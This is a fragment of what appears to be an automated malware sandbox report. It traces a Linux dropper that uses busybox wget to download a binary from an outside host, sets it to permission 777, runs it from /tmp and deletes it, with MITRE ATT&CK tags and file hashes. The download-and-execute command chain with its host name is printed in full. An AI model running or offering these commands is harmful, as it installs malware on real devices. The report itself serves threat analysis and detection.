- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:998
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97